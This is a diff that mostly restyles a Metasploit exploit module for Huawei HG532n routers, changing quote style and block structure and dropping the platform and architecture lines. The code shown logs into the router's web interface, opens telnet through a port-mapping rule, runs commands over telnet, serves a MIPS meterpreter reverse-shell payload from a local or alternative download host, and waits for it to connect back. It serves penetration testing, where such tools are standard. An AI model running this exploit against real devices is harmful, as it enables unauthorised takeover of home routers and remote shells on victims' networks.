@@ -34,8 +34,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'Ahmed S. Darwish <darwish.07@gmail.com>', # Vulnerability discovery, msf module
         ],
         'License' => MSF_LICENSE,
-        'Platform' => ['linux'],
-        'Arch' => ARCH_MIPSBE,
         'Privileged' => true,
         'DefaultOptions' => {
           'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'
@@ -69,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TelnetPassword', [false, 'Telnet username password', 'admin']),
         OptAddress.new('DOWNHOST', [false, 'Alternative host to request the MIPS payload from']),
         OptString.new('DOWNFILE', [false, 'Filename to download, (default: random)']),
-        OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit to connect back", 60])
+        OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit to connect back', 60])
       ], self.class
     )
   end
@@ -85,18 +83,18 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     httpd_fingerprint = %r{
       \A
-      HTTP\/1\.1\s200\sOK\r\n
+      HTTP/1\.1\s200\sOK\r\n
       CACHE-CONTROL:\sno-cache\r\n
       Date:\s.*\r\n
       Connection:\sKeep-Alive\r\n
-      Content-Type:\stext\/html\r\n
+      Content-Type:\stext/html\r\n
       Content-Length:\s\d+\r\n
       \r\n
       <html>\n<head>\n
-      <META\shttp-equiv="Content-Type"\scontent="text\/html;\scharset=UTF-8">\r\n
+      <META\shttp-equiv="Content-Type"\scontent="text/html;\scharset=UTF-8">\r\n
       <META\shttp-equiv="Pragma"\scontent="no-cache">\n
       <META\shttp-equiv="expires"\sCONTENT="-1">\n
-      <link\srel="icon"\stype="image\/icon"\shref="\/favicon.ico"\/>
+      <link\srel="icon"\stype="image/icon"\shref="/favicon.ico"/>
     }x
 
     begin
@@ -125,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def hash_password(password)
     sha256 = OpenSSL::Digest::SHA256.hexdigest(password)
-    Base64.encode64(sha256).gsub(/\s+/, "")
+    Base64.encode64(sha256).gsub(/\s+/, '')
   end
 
   #
@@ -173,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Password' => hash_password(password)
       }
     )
-    fail_with(Failure::Unreachable, "Connection timed out") if res.nil?
+    fail_with(Failure::Unreachable, 'Connection timed out') if res.nil?
 
     unless res.code == 200
       fail_with(Failure::NotFound, "Router returned unexpected HTTP code #{res.code}")
@@ -184,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.body.include? invalid_login_marker
       fail_with(Failure::NoAccess, "Invalid web interface credentials #{username}:#{password}")
     else
-      fail_with(Failure::UnexpectedReply, "Neither valid or invalid login markers received")
+      fail_with(Failure::UnexpectedReply, 'Neither valid or invalid login markers received')
     end
   end
 
@@ -195,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def expose_telnet_port(session_cookies)
     cookie = generate_web_cookie(session: session_cookies)
 
-    external_telnet_port = rand(32767) + 32768
+    external_telnet_port = rand(32768..65534)
 
     portmapping_page = '/html/application/portmapping.asp'
     valid_port_export_marker = "var pageName = '#{portmapping_page}';"
@@ -211,17 +209,17 @@ class MetasploitModule < Msf::Exploit::Remote
         'RequestFile' => portmapping_page
       },
       'vars_post' => {
-        'x.PortMappingProtocol' => "TCP",
-        'x.PortMappingEnabled' => "1",
-        'x.RemoteHost' => "",
+        'x.PortMappingProtocol' => 'TCP',
+        'x.PortMappingEnabled' => '1',
+        'x.RemoteHost' => '',
         'x.ExternalPort' => external_telnet_port.to_s,
         'x.ExternalPortEndRange' => external_telnet_port.to_s,
-        'x.InternalClient' => "192.168.1.1",
-        'x.InternalPort' => "23",
+        'x.InternalClient' => '192.168.1.1',
+        'x.InternalPort' => '23',
         'x.PortMappingDescription' => Rex::Text.rand_text_alpha(10) # Minimize any possible conflict
       }
     )
-    fail_with(Failure::Unreachable, "Connection timed out") if res.nil?
+    fail_with(Failure::Unreachable, 'Connection timed out') if res.nil?
 
     unless res.code == 200
       fail_with(Failure::NotFound, "Router returned unexpected HTTP code #{res.code}")
@@ -233,11 +231,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if res.body.match? invalid_port_export_marker
-      fail_with(Failure::Unknown, "Router reported port-mapping error. " \
+      fail_with(Failure::Unknown, 'Router reported port-mapping error. ' \
                 "A port-forwarding entry with same external port (#{external_telnet_port}) already exist?")
     end
 
-    fail_with(Failure::UnexpectedReply, "Port-forwarding failed: neither valid or invalid markers received")
+    fail_with(Failure::UnexpectedReply, 'Port-forwarding failed: neither valid or invalid markers received')
   end
 
   #
@@ -255,14 +253,14 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res && res.code == 200
-      print_warning "Could not get current forwarded ports from web interface"
+      print_warning 'Could not get current forwarded ports from web interface'
     end
 
     # Collect existing port-forwarding keys; to be passed to the delete POST request
     portforward_key = /InternetGatewayDevice\.WANDevice\.1\.WANConnectionDevice\.1\.WANPPPConnection\.1\.PortMapping\.\d+/
     vars_post = {}
     res.body.scan(portforward_key).uniq.each do |key|
-      vars_post[key] = ""
+      vars_post[key] = ''
     end
 
     res = send_request_cgi(
@@ -275,7 +273,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return if res && res.code == 200
 
-    print_warning "Could not re-hide exposed telnet port"
+    print_warning 'Could not re-hide exposed telnet port'
   end
 
   #
@@ -294,7 +292,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return if res && res.code == 200
 
-    print_warning "Could not logout from web interface. Future web logins may fail!"
+    print_warning 'Could not logout from web interface. Future web logins may fail!'
   end
 
   #
@@ -306,12 +304,10 @@ class MetasploitModule < Msf::Exploit::Remote
   # this by sending a refresh request every second.
   #
   def web_operation
-    begin
-      cookie = web_login
-      yield cookie
-    ensure
-      web_logout(cookie) unless cookie.nil?
-    end
+    cookie = web_login
+    yield cookie
+  ensure
+    web_logout(cookie) unless cookie.nil?
   end
 
   #
@@ -347,31 +343,29 @@ class MetasploitModule < Msf::Exploit::Remote
       read_until(sock, timeout, 'Password:')
       sock.write(IAC + DO + OPT_ECHO + IAC + DO + OPT_SGA)
     rescue ::Timeout::Error
-      fail_with(Failure::UnexpectedReply, "Expected first password banner not received")
+      fail_with(Failure::UnexpectedReply, 'Expected first password banner not received')
     end
 
     begin
       read_until(sock, timeout, 'Password:') # Router bug
       sock.write(datastore['TelnetPassword'] + OPT_NAOFFD + OPT_BINARY)
     rescue ::Timeout::Error
-      fail_with(Failure::UnexpectedReply, "Expected second password banner not received")
+      fail_with(Failure::UnexpectedReply, 'Expected second password banner not received')
     end
   end
 
   def telnet_prompt_wait(error_regex = nil)
-    begin
-      result = read_until(@telnet_sock, @telnet_timeout, @telnet_prompt)
-      if error_regex
-        error_regex = [error_regex] unless error_regex.is_a? Array
-        error_regex.each do |regex|
-          if result.match? regex
-            fail_with(Failure::UnexpectedReply, "Error expression #{regex} included in reply")
-          end
+    result = read_until(@telnet_sock, @telnet_timeout, @telnet_prompt)
+    if error_regex
+      error_regex = [error_regex] unless error_regex.is_a? Array
+      error_regex.each do |regex|
+        if result.match? regex
+          fail_with(Failure::UnexpectedReply, "Error expression #{regex} included in reply")
         end
       end
-    rescue ::Timeout::Error
-      fail_with(Failure::UnexpectedReply, "Expected telnet prompt '#{@telnet_prompt}' not received")
     end
+  rescue ::Timeout::Error
+    fail_with(Failure::UnexpectedReply, "Expected telnet prompt '#{@telnet_prompt}' not received")
   end
 
   #
@@ -391,11 +385,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'Timeout' => @telnet_timeout
     )
     if @telnet_sock.nil?
-      fail_with(Failure::Unreachable, "Exposed telnet port unreachable")
+      fail_with(Failure::Unreachable, 'Exposed telnet port unreachable')
     end
     add_socket(@telnet_sock)
 
-    print_good "Connection succeeded. Passing telnet credentials"
+    print_good 'Connection succeeded. Passing telnet credentials'
     telnet_auth_negotiation(@telnet_sock, @telnet_timeout)
 
     print_good "Credentials passed; waiting for prompt '#{@telnet_prompt}'"
@@ -429,7 +423,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @telnet_sock.write(atp_cmd + OPT_NAOFFD + OPT_BINARY)
     telnet_prompt_wait(error_regex)
-    print_good "Command executed successfully"
+    print_good 'Command executed successfully'
   end
 
   #
@@ -438,11 +432,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def start_http_server
     @pl = generate_payload_exe
 
-    downfile = datastore['DOWNFILE'] || rand_text_alpha(8 + rand(8))
+    downfile = datastore['DOWNFILE'] || rand_text_alpha(rand(8..15))
     resource_uri = '/' + downfile
 
     if datastore['DOWNHOST']
-      print_status "Will not start local web server, as DOWNHOST is already defined"
+      print_status 'Will not start local web server, as DOWNHOST is already defined'
     else
       print_status("Starting web server; hosting #{resource_uri}")
       start_service(
@@ -461,7 +455,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # HTTP server incoming request callback
   #
   def on_request_uri(cli, _request)
-    print_good "HTTP server received request. Sending payload to victim"
+    print_good 'HTTP server received request. Sending payload to victim'
     send_response(cli, @pl)
   end
 
@@ -477,7 +471,7 @@ class MetasploitModule < Msf::Exploit::Remote
     srv_host =
       if datastore['DOWNHOST']
         datastore['DOWNHOST']
-      elsif datastore['SRVHOST'] == "0.0.0.0" || datastore['SRVHOST'] == "::"
+      elsif datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::'
         Rex::Socket.source_address(rhost)
       else
         datastore['SRVHOST']
@@ -501,7 +495,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # will lose the payload's signal otherwise.
   #
   def wait_for_payload_session
-    print_status "Waiting for the payload to connect back .."
+    print_status 'Waiting for the payload to connect back ..'
     begin
       Timeout.timeout(datastore['ListenerTimeout']) do
         loop do
@@ -511,9 +505,9 @@ class MetasploitModule < Msf::Exploit::Remote
         end
       end
     rescue ::Timeout::Error
-      fail_with(Failure::Unknown, "Timeout waiting for payload to start/connect-back")
+      fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back')
     end
-    print_good "Payload connected!"
+    print_good 'Payload connected!'
   end
 
   #
@@ -523,10 +517,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     print_status "Validating router's HTTP server (#{rhost}:#{rport}) signature"
     unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::Unknown, "Unable to validate device fingerprint. Is it an HG532n?")
+      fail_with(Failure::Unknown, 'Unable to validate device fingerprint. Is it an HG532n?')
     end
 
-    print_good "Good. Router seems to be a vulnerable HG532n device"
+    print_good 'Good. Router seems to be a vulnerable HG532n device'
 
     telnet_port = nil
     web_operation do |cookie|
